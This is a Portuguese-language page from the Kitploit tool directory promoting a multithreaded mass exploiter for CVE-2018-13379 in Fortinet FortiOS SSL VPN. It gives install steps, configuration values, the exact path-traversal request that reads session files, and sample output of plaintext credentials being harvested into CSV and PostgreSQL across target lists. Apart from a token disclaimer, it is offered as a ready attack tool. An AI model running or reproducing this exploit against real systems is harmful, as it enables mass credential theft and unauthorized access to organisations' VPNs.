Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — Explorador em massa do CVE-2018-13379 para Fortinet FortiOS SSL VPN. Extrai credenciais instantaneamente, salva em CSV + PostgreSQL. Multithread, sem avisos inúteis. | Kitploit
Ferramentas/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

Explorador em massa do CVE-2018-13379 para Fortinet FortiOS SSL VPN. Extrai credenciais instantaneamente, salva em CSV + PostgreSQL. Multithread, sem avisos inúteis.

Ver Repositório
12há 3 mesesAinda não revisado

preview

CVE-2018-13379 — Exploração em massa do Fortinet FortiOS SSL VPN

Uma ferramenta para exploração em massa da vulnerabilidade CVE-2018-13379 (path traversal) no Fortinet FortiOS SSL VPN. Permite ler arquivos de sessão e extrair logins e senhas em texto claro.

Funcionalidades

  • Exploração da CVE-2018-13379 por meio do endpoint /remote/fgt_lang
  • Multithreading (20 threads por padrão)
  • Salvamento instantâneo das credenciais encontradas em CSV e PostgreSQL
  • Nomes dinâmicos de tabelas no PostgreSQL com timestamp (fortios_creds_20250120_143052)
  • Sem avisos — apenas os resultados

Instalação

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

Configuração

Todas as configurações podem ser editadas diretamente no script — sem complicações com linhas de argumentos de linha de comando:

root@kitploit:~
TARGETS_FILE = "targets.txt" # Arquivo com alvos (ip:porta)
CSV_FILE = "fortios_creds.csv" # Arquivo CSV de saída

PostgreSQL (opcional — o script funciona sem banco de dados)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

Uso

  1. Crie um arquivo targets.txt com os alvos, um por linha:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. Execute o script:
root@kitploit:~
python3 exploit.py

Resultados

  • Arquivo CSV — todas as credenciais encontradas com timestamps
  • Tabela PostgreSQL — uma nova tabela é criada a cada execução (fortios_creds_YYYYMMDD_HHMMSS)

Exemplo de saída:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

Como funciona

  1. Uma solicitação GET é enviada ao endereço https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession
  2. A resposta é verificada para ver se contém a string var fgt_lang (um sinal de vulnerabilidade)
  3. Os pares username e password são extraídos da resposta binária
  4. Os dados encontrados são imediatamente salvos em CSV e PostgreSQL
  5. O script passa para o próximo alvo.

Requisitos

  • Python 3.6+
  • requests
  • psycopg2-binary (opcional — sem ele, apenas arquivos CSV funcionam)
  • urllib3

Aviso

Esta ferramenta destina-se a fins educacionais e testes autorizados. Você é responsável por suas próprias ações.

Agradecimentos

  • Vulnerabilidade original descoberta por Meh Chang
  • A lógica de exploração é baseada em pesquisas publicamente disponíveis

Licença

Unlicense — faça o que quiser.

Baixar ferramenta